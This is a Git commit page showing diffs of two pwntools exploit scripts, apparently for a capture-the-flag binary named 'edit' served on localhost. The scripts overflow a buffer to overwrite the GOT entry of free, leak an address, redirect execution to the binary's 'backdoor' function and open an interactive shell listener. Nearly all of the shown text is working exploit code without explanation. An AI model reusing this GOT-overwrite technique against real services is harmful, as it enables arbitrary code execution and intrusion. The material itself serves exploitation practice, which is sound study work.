danger/program
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

henry_2.0_commit

Browse Source
This commit is contained in:
danger
2024-11-06 10:23:47 +08:00
parent a7fdf479a5
commit 3d65a92466
17 changed files with 2709 additions and 33 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
input/dprintf.i64
View File

Binary file not shown.

BIN
input/edit.i64
View File

Binary file not shown.

18
input/edit.py Executable file → Normal file
View File

@@ -2,7 +2,7 @@
# -*- coding:utf-8 -*-
from pwn import *
context.clear(arch='amd64', os='linux', log_level='info')
context.clear(arch='amd64', os='linux', log_level='debug')
elf = ELF('./edit')
@@ -11,23 +11,35 @@ sh = listen(12012)
tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'ADD aaaa')
tcpClient.close()
print("successfully add")
tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'EDIT aaaa ' + b'a' * 256 + p64(elf.got['free']))
tcpClient.close()
print(hex(elf.got['free']))
print("successfully edit")
tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'SHOW')
tcpClient.recvline()
content = tcpClient.recvuntil('a'*0x100)
print(b"content ==> " + content)
index_str = tcpClient.recvline()[:-1]
second_str = tcpClient.recvline()[:-1]
tcpClient.close()
# print("index_str == " + hex(int(index_str,16)))
print(b"index_str == " + index_str)
print(b"second_str == " + second_str)
print("successfully show")
tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'EDIT ' + index_str + b' ' + p64(elf.sym['backdoor']))
tcpClient.sendline(b'EDIT ' + second_str + b' ' + p64(elf.sym['backdoor']))
tcpClient.close()
print("successfully edit")
tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'DEL ' + p64(elf.sym['backdoor'])[:3])
tcpClient.close()
print(hex(elf.sym['backdoor']))
sh.interactive()

34
input/edit2.py Normal file
View File

@@ -0,0 +1,34 @@
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
from pwn import *
context.clear(arch='amd64', os='linux', log_level='info')
elf = ELF('./edit')
sh = listen(12012)
tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'ADD aaaa')
tcpClient.close()
tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'EDIT aaaa ' + b'a' * 256 + p64(elf.got['free']))
tcpClient.close()
tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'SHOW')
tcpClient.recvline()
index_str = tcpClient.recvline()[:-1]
print(index_str)
tcpClient.close()
tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'EDIT ' + index_str + b' ' + p64(elf.sym['backdoor']))
tcpClient.close()
tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'DEL ' + p64(elf.sym['backdoor'])[:3])
tcpClient.close()
sh.interactive()

BIN
input/recv.i64
View File

Binary file not shown.